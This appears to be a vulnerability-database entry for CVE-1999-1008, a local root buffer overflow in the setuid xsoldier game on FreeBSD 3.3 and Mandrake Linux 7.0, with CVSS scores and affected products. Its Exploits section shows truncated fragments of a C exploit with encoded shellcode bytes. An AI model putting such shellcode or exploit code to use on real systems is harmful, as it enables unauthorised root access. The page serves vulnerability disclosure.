7.2
CVSSv2

CVE-1999-1008

Published: 17/05/2000 Updated: 18/10/2016
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 735
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

xsoldier program allows local users to gain root access via a long argument.

Vulnerable Product Search on Vulmon Subscribe to Product

mandrakesoft mandrake linux 7.0

freebsd freebsd 3.3

Exploits

#include <stdioh> #include <stdlibh> #define NOP 0x90 #define BUFSIZE 4408 #define OFFSET 0 #define RANGE 20 unsigned char blah[] = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa" "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" "\x54\x88\xe4\x82\xed\x1d\x56\x5 ...
source: wwwsecurityfocuscom/bid/871/info Certain versions of FreeBSD (33 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console The binary itself is subject to a buffer overflow attack (wh ...
/* source: wwwsecurityfocuscom/bid/871/info Certain versions of FreeBSD (33 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console The binary itself is subject to a buffer overflow attac ...